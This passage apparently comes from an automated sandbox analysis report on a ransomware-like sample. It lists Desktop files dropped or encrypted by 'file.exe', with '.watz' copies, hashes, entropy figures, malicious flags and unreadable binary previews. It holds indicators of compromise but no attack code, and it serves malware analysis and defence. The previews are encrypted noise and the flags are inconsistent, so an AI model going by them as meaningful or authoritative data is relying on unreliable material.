...}...l.!^D..[..e..'.[.h.<..Y.d....}.C....v;>..._..K.%s..`%..?'R.e.......r)...,.#Q).....E....v2u..i......fG...$5....P'...H../.<k.....030.....r..[h..z.....JA...hq....u.3..".k.~.......6....rH.,..zl.S...6u\.R.\$.`.r]..iA\|.=6S...t=......Bo...]..qo.e..P......k...B..=^...&/..J+..%~......{{.....?.6&....].F#n....1(...d...I5......u..Nj@c~.ug.h...3.$O.../.....)....`..r....7..<rp1.[."....V.Q]...q..]Z.^.\|..?..!.......a....r.Ai..Y.?..dBh8.!b.8G.).,8..,$~l&.Q.t..)....sbH........X~+-.....+VW.j.5.O......Q.\..0A]z$?..N..H........7.-.t..].......O.....g.......y...6<.f_F..,.\..<.h.~.......)..]I...{;..s

C:\Users\user\Desktop\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857235699707018
Encrypted:	false
SSDEEP:	24:f9quqnB+WNMBjtqEJnn0JjhlbcqEorZEU3Q12Qasa6X2rxSTx/bD:V0B+Bttqcnn0Bh5cqEoraIQ12QasFX2Y
MD5:	FC77D81267D5DFDD005ED922F66E89E0
SHA1:	BABBF35FBD19440B56E29F67386C4BBEFC939642
SHA-256:	5F52C06D2DB5170E3C711DA13B320BD8544327E873B9008A6A9C744AE8521624
SHA-512:	CA80B12A8D8C136394601773973BD7B35781600086FC3097421DCA80334B5136AA1150C3AE09F19237CBD114C4D57EB2CB556AAB86FA1112D929A81C8DDF5536
Malicious:	false
Preview:	JSDNG....3V-.$..a0$.F.!...>...;f.P{...U.Z'.q....t.I. .h-.vJV.2Uh...#.N".........n5..^.K..Z..BxC..?..<.[3ts....v..9u.t.prM......z{.N...U5'2.TB..v.4@P.1[=."-.i.?<.z..$;.?....b,.3j.].r...l<j.YF.{.:....bi.3.W.KEgJ..(..5....F\...........{...~..V_.+...._>..M.i.,&.c......b.H...a.v.2..l...gJ......9&4.L..x.....\...~E...q+.q.N.z'...K..7./.C'....r.3MF.D.A..Q......oJ....^xU.R...%...\..9...DY.......iD.' .....s.......].ug.%....y"....^9..]......I.P..@...IB....L.B..+iIL.D..o.....z....hP...k..trJH...Y..m...C~z[...........T.z...=.L..A...z%.8..6.A.[.toS>e.4..l.{.3....0o.-.f.G...kp ......V^.+.tB-..V& .[mzd...ga......\.6L...........#..W!%.V%..+....T....\R..r..N.9KH..f.YQ.p....~........<....[R..IX............Ps.X.>Y..-e ..Pq;u.i..O..U.c.A.w>.5..d.......k...,....x...$..d...q..qa..il.KQ....g..$.....?...eY......&u..M.2}....1q.y}............>(.X.a>....h.e........c....-.+.:..w..H%u...Ojt..5e..7^P.._..`....E.....V.[.WU..:.w..A"...G.kd.<.-..k!.[...P...o..E.

C:\Users\user\Desktop\JSDNGYCOWY.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857235699707018
Encrypted:	false
SSDEEP:	24:f9quqnB+WNMBjtqEJnn0JjhlbcqEorZEU3Q12Qasa6X2rxSTx/bD:V0B+Bttqcnn0Bh5cqEoraIQ12QasFX2Y
MD5:	FC77D81267D5DFDD005ED922F66E89E0
SHA1:	BABBF35FBD19440B56E29F67386C4BBEFC939642
SHA-256:	5F52C06D2DB5170E3C711DA13B320BD8544327E873B9008A6A9C744AE8521624
SHA-512:	CA80B12A8D8C136394601773973BD7B35781600086FC3097421DCA80334B5136AA1150C3AE09F19237CBD114C4D57EB2CB556AAB86FA1112D929A81C8DDF5536
Malicious:	false
Preview:	JSDNG....3V-.$..a0$.F.!...>...;f.P{...U.Z'.q....t.I. .h-.vJV.2Uh...#.N".........n5..^.K..Z..BxC..?..<.[3ts....v..9u.t.prM......z{.N...U5'2.TB..v.4@P.1[=."-.i.?<.z..$;.?....b,.3j.].r...l<j.YF.{.:....bi.3.W.KEgJ..(..5....F\...........{...~..V_.+...._>..M.i.,&.c......b.H...a.v.2..l...gJ......9&4.L..x.....\...~E...q+.q.N.z'...K..7./.C'....r.3MF.D.A..Q......oJ....^xU.R...%...\..9...DY.......iD.' .....s.......].ug.%....y"....^9..]......I.P..@...IB....L.B..+iIL.D..o.....z....hP...k..trJH...Y..m...C~z[...........T.z...=.L..A...z%.8..6.A.[.toS>e.4..l.{.3....0o.-.f.G...kp ......V^.+.tB-..V& .[mzd...ga......\.6L...........#..W!%.V%..+....T....\R..r..N.9KH..f.YQ.p....~........<....[R..IX............Ps.X.>Y..-e ..Pq;u.i..O..U.c.A.w>.5..d.......k...,....x...$..d...q..qa..il.KQ....g..$.....?...eY......&u..M.2}....1q.y}............>(.X.a>....h.e........c....-.+.:..w..H%u...Ojt..5e..7^P.._..`....E.....V.[.WU..:.w..A"...G.kd.<.-..k!.[...P...o..E.

C:\Users\user\Desktop\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8583373930912535
Encrypted:	false
SSDEEP:	24:ULMtT8dppYR6zdTuBTa0WdNLG4/eBZWTh9dn9McxwAAf7bD:UgKnSM58a5PcUTPd9McxwnD
MD5:	A157F61A170F3C78F27256F76A2AD93F
SHA1:	A5300BE2BDC1A649E2933F4128BDDDC1358C5F58
SHA-256:	BA3AB15904806D4A6EFACD176C79C6E9A1C4B721B9E24B6234E0A969F1085B3B
SHA-512:	CEB5895BC49FD874309C3D8514AA2A5820B83F0B72539733A90E80E7B811DC5931D647854512312CBC98B4496EB810342F82A8F0A592FF8156EF2C8F29371242
Malicious:	false
Preview:	JSDNG.z.d.>...I...H..q.x.....p.]..s.......h.D....\;...a........{r.y...?E...t..q..6..0C.~.Z...;$...[.}.....e.BmY....D0`..y.%.r*.$Q.hEh%&...Z3.xqb..m:D.xU1l d9D............K.%.X.Q..t.3.]?-........r.....(..v........:.f.%.t2i.....<.....S9.i.T....8jj3......:...J.i.wl...-IO\|.`.f~.&.(\y.#b......U.)......O.G..E.]+..'%q.F.......ru.r......J.!.j.....dI..G..+I.v].Oy..3..l.....k..........?i....4....M.i4.F......=........rme+......Ts.^......$..............e.G.m~X.X..1.~,.....[..M..3g....%F/].%<.{...n.....7L....(.E.d.\|.. GU.n..}..F....g.vO...q.;$.LP.r.i..6........t..@$....9.PG.<..L....L:=.u...>.....`.Q.I.k...i.7.HS$.%...1A...j.c.k.._..[i.[..6..._w..V.......g..f.l.)...9y...[...EsZ\.....a.:....w+.?s......N.+{t!.(.^....<.X.....@...."...\,..%<.Rm...)..R...q.f....$p.....'.......q8...3E...\..r..A#.....,.....v...r.nB[...G...W..-~......q.......qw'...\|..\|..7V....}... ......8.)..l...j... eoM....i.h..i..Uk.....tJ...,.....l...h.....Tb........t.ZH...]1N.....(

C:\Users\user\Desktop\JSDNGYCOWY.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8583373930912535
Encrypted:	false
SSDEEP:	24:ULMtT8dppYR6zdTuBTa0WdNLG4/eBZWTh9dn9McxwAAf7bD:UgKnSM58a5PcUTPd9McxwnD
MD5:	A157F61A170F3C78F27256F76A2AD93F
SHA1:	A5300BE2BDC1A649E2933F4128BDDDC1358C5F58
SHA-256:	BA3AB15904806D4A6EFACD176C79C6E9A1C4B721B9E24B6234E0A969F1085B3B
SHA-512:	CEB5895BC49FD874309C3D8514AA2A5820B83F0B72539733A90E80E7B811DC5931D647854512312CBC98B4496EB810342F82A8F0A592FF8156EF2C8F29371242
Malicious:	false
Preview:	JSDNG.z.d.>...I...H..q.x.....p.]..s.......h.D....\;...a........{r.y...?E...t..q..6..0C.~.Z...;$...[.}.....e.BmY....D0`..y.%.r*.$Q.hEh%&...Z3.xqb..m:D.xU1l d9D............K.%.X.Q..t.3.]?-........r.....(..v........:.f.%.t2i.....<.....S9.i.T....8jj3......:...J.i.wl...-IO\|.`.f~.&.(\y.#b......U.)......O.G..E.]+..'%q.F.......ru.r......J.!.j.....dI..G..+I.v].Oy..3..l.....k..........?i....4....M.i4.F......=........rme+......Ts.^......$..............e.G.m~X.X..1.~,.....[..M..3g....%F/].%<.{...n.....7L....(.E.d.\|.. GU.n..}..F....g.vO...q.;$.LP.r.i..6........t..@$....9.PG.<..L....L:=.u...>.....`.Q.I.k...i.7.HS$.%...1A...j.c.k.._..[i.[..6..._w..V.......g..f.l.)...9y...[...EsZ\.....a.:....w+.?s......N.+{t!.(.^....<.X.....@...."...\,..%<.Rm...)..R...q.f....$p.....'.......q8...3E...\..r..A#.....,.....v...r.nB[...G...W..-~......q.......qw'...\|..\|..7V....}... ......8.)..l...j... eoM....i.h..i..Uk.....tJ...,.....l...h.....Tb........t.ZH...]1N.....(

C:\Users\user\Desktop\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844420312057487
Encrypted:	false
SSDEEP:	24:kBrMdi9W9Ih9wJ5AJwx+bAHzvLwvbi4sGeR5Hbf5DQETyOjBxYpkmDQLNiebD:ioRILweC+bAH/wzDsGE7f5D3lg6ciD
MD5:	BEA904EB57BED3D9F2B23FB25206E225
SHA1:	1F14A16CAC5C8146D09C7AA26E539AF43E2AD054
SHA-256:	10E99E863A13EB7AB2830EE1EDE0C25AC17E67769C591DA155FD761194939888
SHA-512:	D96132AC16D35A564E8E647F574F8EB799A1BD4B13DF3E4AE131169919F1A2CEA2E004E44C8E1356823E679A56236748DDE5C2CB3B78351034B294C01F92A521
Malicious:	true
Preview:	KATAX-+0R)d>..U?.Ym~ ...b..M.[....mZ....r.@_.AD....k:V...o...;t..8i.3R.................I..E..s.....L.2..4.cu!.....zD.L;g..`..l..i....[.G..}OdBT..\ga...Q.d..7.z.....R...........u..B.-W.:.G$..".aM....xT......... .j...g..<..BTn.=..~..E%$............L.....I%g^>..#....j..p.(zk..............J.@...z;6..x....G.......o...F.M_./.c.TT.;.hL......f..-by..ujn.J..H.,.]...#.uV....!q........E.O.r.9..(...5B..O..$.!q.....(.v6D..}..':D_..../f..?.p".y.N>H.?...&..H..:.....w.'.k..x...Z;0^MR.....j..a........e5%......?...?.9..+..U..:....b......O.kQ.._.@..= .....mh$.........G.~..:...QF.vG.......t...jr..iDR.ykzy..>.N..4...T..Z$.b........H\#.o......K.[.yEK.G..>N...h....^&.s.....9.+.$1.B.G....W..\...Y..ws...s...\G@s...._.F7..)r.."..._F ..L..\. LeW.I.\.._........'+...w....m.a. Y.(..T..".^.....kmw[.vG..b....e.{.n/.7.4\|..g!..E....\..b.q...D.z.........j.KC0.8.;I).......O...'...`.`..33fC.........a....m....O..Po..B..#*..]...}h..B.'(s...o+Y..ue....Yj..I:...ep.J.DK....

C:\Users\user\Desktop\KATAXZVCPS.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844420312057487
Encrypted:	false
SSDEEP:	24:kBrMdi9W9Ih9wJ5AJwx+bAHzvLwvbi4sGeR5Hbf5DQETyOjBxYpkmDQLNiebD:ioRILweC+bAH/wzDsGE7f5D3lg6ciD
MD5:	BEA904EB57BED3D9F2B23FB25206E225
SHA1:	1F14A16CAC5C8146D09C7AA26E539AF43E2AD054
SHA-256:	10E99E863A13EB7AB2830EE1EDE0C25AC17E67769C591DA155FD761194939888
SHA-512:	D96132AC16D35A564E8E647F574F8EB799A1BD4B13DF3E4AE131169919F1A2CEA2E004E44C8E1356823E679A56236748DDE5C2CB3B78351034B294C01F92A521
Malicious:	false
Preview:	KATAX-+0R)d>..U?.Ym~ ...b..M.[....mZ....r.@_.AD....k:V...o...;t..8i.3R.................I..E..s.....L.2..4.cu!.....zD.L;g..`..l..i....[.G..}OdBT..\ga...Q.d..7.z.....R...........u..B.-W.:.G$..".aM....xT......... .j...g..<..BTn.=..~..E%$............L.....I%g^>..#....j..p.(zk..............J.@...z;6..x....G.......o...F.M_./.c.TT.;.hL......f..-by..ujn.J..H.,.]...#.uV....!q........E.O.r.9..(...5B..O..$.!q.....(.v6D..}..':D_..../f..?.p".y.N>H.?...&..H..:.....w.'.k..x...Z;0^MR.....j..a........e5%......?...?.9..+..U..:....b......O.kQ.._.@..= .....mh$.........G.~..:...QF.vG.......t...jr..iDR.ykzy..>.N..4...T..Z$.b........H\#.o......K.[.yEK.G..>N...h....^&.s.....9.+.$1.B.G....W..\...Y..ws...s...\G@s...._.F7..)r.."..._F ..L..\. LeW.I.\.._........'+...w....m.a. Y.(..T..".^.....kmw[.vG..b....e.{.n/.7.4\|..g!..E....\..b.q...D.z.........j.KC0.8.;I).......O...'...`.`..33fC.........a....m....O..Po..B..#*..]...}h..B.'(s...o+Y..ue....Yj..I:...ep.J.DK....

C:\Users\user\Desktop\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.822994955624643
Encrypted:	false
SSDEEP:	24:czPsecaa7L7HJNgTA+zrgka+vzjxeYXwgS8ahJZ7ngnYkRcQbD:g8lzHJKvMkpxeYtyhjgnZWKD
MD5:	F1DF9C51797F550FC126991068835FF5
SHA1:	B1E275FCA0E8759B728A96EF6D3AF93D840ACD4A
SHA-256:	5EFFFD30C7850A916049CDE73B48F45942DC4BA2AB88FB46AE9283B84C190938
SHA-512:	BED836614330FCB80E260F5242713A7DA1D5998B87D8415A7E377D940AD831FE60E2B07E15D5A3B5DB065E28D616782F7ED87E3B7A9D68E2B119580CD1761D27
Malicious:	false
Preview:	KATAX..Xvt...8Z.yh.....Fj.2>....."8.G.&_.B....cM!?..i.,}4...J...$..p..x.k...Bo.-..aT.#BY.%..(H....kb.$....P.......Lc..VBY..g.(.f.....DZ.w..(...bv..0#./......F.........S.K...pS..:."'...5.B..M.f.!......G...<M]y....P4..vzKWebG?.....V?9.......j..p...........[r.e.#...x........t...v...3...g?a..k3B$.......h..m...wk.G.f.r.k.O(.5.V....Q..P2?..Z%#...jT...x......f.%=...p6v.....]....Ki.~....V....D...w.......!I..aQ.PC>.DVD.v..z...os.....].....n.8B8^.KK..Q-..st...q."..a&..X....z.3P.i.;5h.+.\..p....:m.1e....yu..^.z.-...K.....y..N?.I@.%....`.eT.......O..@..9.i..`..4'\,.....!.G...Y.^\.z..6>C3D....ou.q...O.....A.k.+.N(...y..4,E6.a.&.Nf.....'........r......\...%d...!..4\|.VT......Z.D."...~8.a..-~O.![?y.U..u...A.<].@.f..t.e.:.Oc.]..;t.%.!.....v.......D.=.Pr....l0.8.>..@D5...c9r.\|T.l..U...:...6.....jt....^y....Ve.h.`D[.~j.Z_aE.O,.$7....T.%..y..boy.EY...=...U.....1....g...$.6.9........@.........a.......'......Sey.F.^<@%../.O#.........'7..r....F.Xm.h..z..KM. ..!.

C:\Users\user\Desktop\KATAXZVCPS.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.822994955624643
Encrypted:	false
SSDEEP:	24:czPsecaa7L7HJNgTA+zrgka+vzjxeYXwgS8ahJZ7ngnYkRcQbD:g8lzHJKvMkpxeYtyhjgnZWKD
MD5:	F1DF9C51797F550FC126991068835FF5
SHA1:	B1E275FCA0E8759B728A96EF6D3AF93D840ACD4A
SHA-256:	5EFFFD30C7850A916049CDE73B48F45942DC4BA2AB88FB46AE9283B84C190938
SHA-512:	BED836614330FCB80E260F5242713A7DA1D5998B87D8415A7E377D940AD831FE60E2B07E15D5A3B5DB065E28D616782F7ED87E3B7A9D68E2B119580CD1761D27
Malicious:	false
Preview:	KATAX..Xvt...8Z.yh.....Fj.2>....."8.G.&_.B....cM!?..i.,}4...J...$..p..x.k...Bo.-..aT.#BY.%..(H....kb.$....P.......Lc..VBY..g.(.f.....DZ.w..(...bv..0#./......F.........S.K...pS..:."'...5.B..M.f.!......G...<M]y....P4..vzKWebG?.....V?9.......j..p...........[r.e.#...x........t...v...3...g?a..k3B$.......h..m...wk.G.f.r.k.O(.5.V....Q..P2?..Z%#...jT...x......f.%=...p6v.....]....Ki.~....V....D...w.......!I..aQ.PC>.DVD.v..z...os.....].....n.8B8^.KK..Q-..st...q."..a&..X....z.3P.i.;5h.+.\..p....:m.1e....yu..^.z.-...K.....y..N?.I@.%....`.eT.......O..@..9.i..`..4'\,.....!.G...Y.^\.z..6>C3D....ou.q...O.....A.k.+.N(...y..4,E6.a.&.Nf.....'........r......\...%d...!..4\|.VT......Z.D."...~8.a..-~O.![?y.U..u...A.<].@.f..t.e.:.Oc.]..;t.%.!.....v.......D.=.Pr....l0.8.>..@D5...c9r.\|T.l..U...:...6.....jt....^y....Ve.h.`D[.~j.Z_aE.O,.$7....T.%..y..boy.EY...=...U.....1....g...$.6.9........@.........a.......'......Sey.F.^<@%../.O#.........'7..r....F.Xm.h..z..KM. ..!.

C:\Users\user\Desktop\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846080261252194
Encrypted:	false
SSDEEP:	24:p+pdmiI7oD6XBlhS9pIZlnxpjWM+dd4xS0yk6Kp1IKqrix2C/0JM0TWR7sU8jbD:p+psinEVS9p+xxWldKS0yrY4rSMYCU8z
MD5:	45164AC25A9224AE8BA0661F8FE8657D
SHA1:	A2947C531489886E9228111CF28F5D9E66B72CA4
SHA-256:	9468780D0613E160D59A73041BB1AB171006890E636D71EB8AD1FE79F8637F20
SHA-512:	C1B5E26BC34D1E7D3B696B18AAA765613C8DE68FB44B2181554E6CB7439DB0F55D610E5975D330830A901A43A97A58EDA12C271D3FAE0B4E9F2781094C8F1258
Malicious:	false
Preview:	NWTVC.!.dF.Z/..P..J.c.B"`z.x.......}........hC...R6.d5HD.&..x9....Jk..U......3.....6.S......'.kKn.[...q98c.nKE0P.\=I...z..'w@..9.k.t.g.....y:d..z..v....mXE..W..1o...].>....'$;.g..I7.>`...}\.$.1.BV.J.N..?.@\|...g...V.......]...ep.py.w.C..;I..M....M..Fo.U......lH.XS,....A......9..D..cOP.&p..h......Q......V.!.."5m.....e$....k9.K)...C?....Y..3..8l+.^...g....bV...n.1[.6wb.E.+...#...zK.C.)...3}u..L.{&BA;[:..u..w.......W...H..ms9....W.l`...H........k......7....q..Y...<7rwW..B.q=..\|N}(R.....p..P1......Y.;...c........v_...5..oa.o.W........=....]..!tZv.^.Vr.;.{..!....d.(U=....v......d....]9..c .@J..)]...f....Y.d..M."!....9......(..^4..........JeJ..N...n&Hb)Jd^........Y..d...mp5.@.....;.l.....l...S`..LV8.P."......c.f.a..n..,y.q.....d....9.YL...!.7..).F3...H...y..8.......@..Q[...&....!..j....'....].j......,p:........{.......&U...O..a.......W.=...6w>.w...y,.%TE*z#.D..N........RZ..{.z.H.8".A..IS..l..;z.).y..7...R../..r.};.....F8.kr/F;.#S.o6..0{.+.X30.

C:\Users\user\Desktop\NWTVCDUMOB.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846080261252194
Encrypted:	false
SSDEEP:	24:p+pdmiI7oD6XBlhS9pIZlnxpjWM+dd4xS0yk6Kp1IKqrix2C/0JM0TWR7sU8jbD:p+psinEVS9p+xxWldKS0yrY4rSMYCU8z
MD5:	45164AC25A9224AE8BA0661F8FE8657D
SHA1:	A2947C531489886E9228111CF28F5D9E66B72CA4
SHA-256:	9468780D0613E160D59A73041BB1AB171006890E636D71EB8AD1FE79F8637F20
SHA-512:	C1B5E26BC34D1E7D3B696B18AAA765613C8DE68FB44B2181554E6CB7439DB0F55D610E5975D330830A901A43A97A58EDA12C271D3FAE0B4E9F2781094C8F1258
Malicious:	false
Preview:	NWTVC.!.dF.Z/..P..J.c.B"`z.x.......}........hC...R6.d5HD.&..x9....Jk..U......3.....6.S......'.kKn.[...q98c.nKE0P.\=I...z..'w@..9.k.t.g.....y:d..z..v....mXE..W..1o...].>....'$;.g..I7.>`...}\.$.1.BV.J.N..?.@\|...g...V.......]...ep.py.w.C..;I..M....M..Fo.U......lH.XS,....A......9..D..cOP.&p..h......Q......V.!.."5m.....e$....k9.K)...C?....Y..3..8l+.^...g....bV...n.1[.6wb.E.+...#...zK.C.)...3}u..L.{&BA;[:..u..w.......W...H..ms9....W.l`...H........k......7....q..Y...<7rwW..B.q=..\|N}(R.....p..P1......Y.;...c........v_...5..oa.o.W........=....]..!tZv.^.Vr.;.{..!....d.(U=....v......d....]9..c .@J..)]...f....Y.d..M."!....9......(..^4..........JeJ..N...n&Hb)Jd^........Y..d...mp5.@.....;.l.....l...S`..LV8.P."......c.f.a..n..,y.q.....d....9.YL...!.7..).F3...H...y..8.......@..Q[...&....!..j....'....].j......,p:........{.......&U...O..a.......W.=...6w>.w...y,.%TE*z#.D..N........RZ..{.z.H.8".A..IS..l..;z.).y..7...R../..r.};.....F8.kr/F;.#S.o6..0{.+.X30.

C:\Users\user\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843613022306517
Encrypted:	false
SSDEEP:	24:tjrqg2/LMusRSXuYGPxHmhR3ZTVSNFif09WFsX6BhxflieJEf57JbD:t3qrsRS+YGEhxZhSafFsMhx9ieo57pD
MD5:	459306F6F435C6E3A4AB7CF47B8E1718
SHA1:	ABEAF352F3FF1BA1834F5F6C83B9F9B42AD2CB55
SHA-256:	B866878B1AC594A2B19F5A4266408C145A4936C40410E62B0910FA8424C576F5
SHA-512:	9F00065EE24C4B1E507CEAEE7E41FFDFB8EFFAC140812BE4E789D745FA09FC56EFC5AB6166460B030BAFB4F1BEFB1982514AA7F5A42D90E34AAB2B3507C8C3A9
Malicious:	false
Preview:	ONBQC1....s.!.[.i.n........e....-d..U3.^.....Hb..l....%.......6\|.r..>...<.ejG.u....E...\.!....k0.M`a}b.OA.7.0.B.=.B...S.8 ........]1L..$.^'T..:...eC.t8..Q...=...6..%..chG../P?...1.A.?....U..^hK...x...q...(4.o..&.e..R.......5..S..).PM..\..lz<..I.........B..U...U. =.[.}..I&.K......^..p....."$.._.h.i.'..@..?9.I-!.t....._.Z..u..<.!.j..F....<..6...I..[...`b..ku(5.N......;FxB.f.5.....g...o...J./u./..D._.q.B%.C.L.uF...stA...tgc...;^'...`....f..l....ln.LNsH%..`.o_...zC...~'.@i..Ic..H.a..]CJS.^k....=.r.$......d..?u..D..T.."....h].../.<..:6.........="#Zk'_.........d6..Ys.r...P..Si...F.bC..D..FT..X.J...T.863..].8s.E.y[.z....8.....l(..#........d"..{.`.a.F.T..B\..*...!T.!.ez3.k.+.......3?...B..#.B.........z..<.C..s..n...!......=V..Pjw"..t.f..u...Lx...rr...8(...p..w.}.../..l.Z.%m..Jv..xnHh...'o.. $T.....X..\..g..k.......U.A.....}4.....P..]....'g.60...s........gkE...5.s..v._.....{.\'GS...z....6. 1.$.l&.P.jb.7......1.$<....h..t.l.t..K..@.[.J..p...4.d.J5

C:\Users\user\Desktop\ONBQCLYSPU.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843613022306517
Encrypted:	false
SSDEEP:	24:tjrqg2/LMusRSXuYGPxHmhR3ZTVSNFif09WFsX6BhxflieJEf57JbD:t3qrsRS+YGEhxZhSafFsMhx9ieo57pD
MD5:	459306F6F435C6E3A4AB7CF47B8E1718
SHA1:	ABEAF352F3FF1BA1834F5F6C83B9F9B42AD2CB55
SHA-256:	B866878B1AC594A2B19F5A4266408C145A4936C40410E62B0910FA8424C576F5
SHA-512:	9F00065EE24C4B1E507CEAEE7E41FFDFB8EFFAC140812BE4E789D745FA09FC56EFC5AB6166460B030BAFB4F1BEFB1982514AA7F5A42D90E34AAB2B3507C8C3A9
Malicious:	false
Preview:	ONBQC1....s.!.[.i.n........e....-d..U3.^.....Hb..l....%.......6\|.r..>...<.ejG.u....E...\.!....k0.M`a}b.OA.7.0.B.=.B...S.8 ........]1L..$.^'T..:...eC.t8..Q...=...6..%..chG../P?...1.A.?....U..^hK...x...q...(4.o..&.e..R.......5..S..).PM..\..lz<..I.........B..U...U. =.[.}..I&.K......^..p....."$.._.h.i.'..@..?9.I-!.t....._.Z..u..<.!.j..F....<..6...I..[...`b..ku(5.N......;FxB.f.5.....g...o...J./u./..D._.q.B%.C.L.uF...stA...tgc...;^'...`....f..l....ln.LNsH%..`.o_...zC...~'.@i..Ic..H.a..]CJS.^k....=.r.$......d..?u..D..T.."....h].../.<..:6.........="#Zk'_.........d6..Ys.r...P..Si...F.bC..D..FT..X.J...T.863..].8s.E.y[.z....8.....l(..#........d"..{.`.a.F.T..B\..*...!T.!.ez3.k.+.......3?...B..#.B.........z..<.C..s..n...!......=V..Pjw"..t.f..u...Lx...rr...8(...p..w.}.../..l.Z.%m..Jv..xnHh...'o.. $T.....X..\..g..k.......U.A.....}4.....P..]....'g.60...s........gkE...5.s..v._.....{.\'GS...z....6. 1.$.l&.P.jb.7......1.$<....h..t.l.t..K..@.[.J..p...4.d.J5

C:\Users\user\Desktop\ONBQCLYSPU\DVWHKMNFNN.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875668569637873
Encrypted:	false
SSDEEP:	24:8BHjDZ+QNDDNyAtdXW+CCIvqqE6D334lAfM2aJ0b4dAMUjM+mcJjmMLOMubD:8jF+QNhXdmCICB6D33RaJXH+XpmMCFD
MD5:	3E0BF7A15167D3D5E7AE1AC5C7423167
SHA1:	C2452FE1FAD4219440EF276FE08815E08DA90C46
SHA-256:	4D3E70C83229265B0276AB5003CE480ECA0BC822B45E96762BA4E5F61022F775
SHA-512:	662ECA88E406C080C46F1DDB7A09571B2C622E05620A493C5021FEC98F59301D7F542A132E8362537E31E45D3118AD735B14F27A2C3334613031E2673AE133BB
Malicious:	false
Preview:	DVWHK.."...n....p.IZ_.b..v.........k.....8......,r...E.`_b.......&...\Ei!Ne..~.K.....xM..}.F.&....D.Ds.4i.x......_..B....x5.u.V;x.....iQ.1.=..[...... .Z...w .cM4..E.d..O.f....>>.....5P.?r.N...........+...Jc.....p.v.1rG^..'._x#.YR......K.(-3............z...l..n....V.@.....%~..W..k.e...v49!c..z..&mQ.?._..j......y..._..g...o.N..p[.y..K..../....O1...!v.,&....8....%. .y@.~."i. # 2.L\A..`..L....k..h....M.<w...w...%..M......5'........n...\,Wd.Y......Z6b.[V.u..t.!C.Ee....d.O...t273...y...2$..[.dP..d.?.fgG.....,#....^...d3.Q.a;..Os..c.^.i..n8..&.5.w.M....k/...>l..B7...W...S2..Q..J5D..^.%.7.R.RJ..ea.Z...\t.WR..W).\...d1...-:.....U.AdU.......ae.=!?..!.8_;.?......h=..5....;.3.>...g........e[..<...\.._.._..O[...r.t.rc4ZD.~.[...@i.b.....H....L./.7_:....>..0...R.....Q.......h.X..._...S......M.f.F...<i.....Faj..K.g';....@fS....<.........]._...M..w...R..{.....e.g..I. X.E..4......[Jw..m...{...I.l..G.z...,.v...Sf...u...U.0.....+..,.qM...9.....

C:\Users\user\Desktop\ONBQCLYSPU\DVWHKMNFNN.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875668569637873
Encrypted:	false
SSDEEP:	24:8BHjDZ+QNDDNyAtdXW+CCIvqqE6D334lAfM2aJ0b4dAMUjM+mcJjmMLOMubD:8jF+QNhXdmCICB6D33RaJXH+XpmMCFD
MD5:	3E0BF7A15167D3D5E7AE1AC5C7423167
SHA1:	C2452FE1FAD4219440EF276FE08815E08DA90C46
SHA-256:	4D3E70C83229265B0276AB5003CE480ECA0BC822B45E96762BA4E5F61022F775
SHA-512:	662ECA88E406C080C46F1DDB7A09571B2C622E05620A493C5021FEC98F59301D7F542A132E8362537E31E45D3118AD735B14F27A2C3334613031E2673AE133BB
Malicious:	false
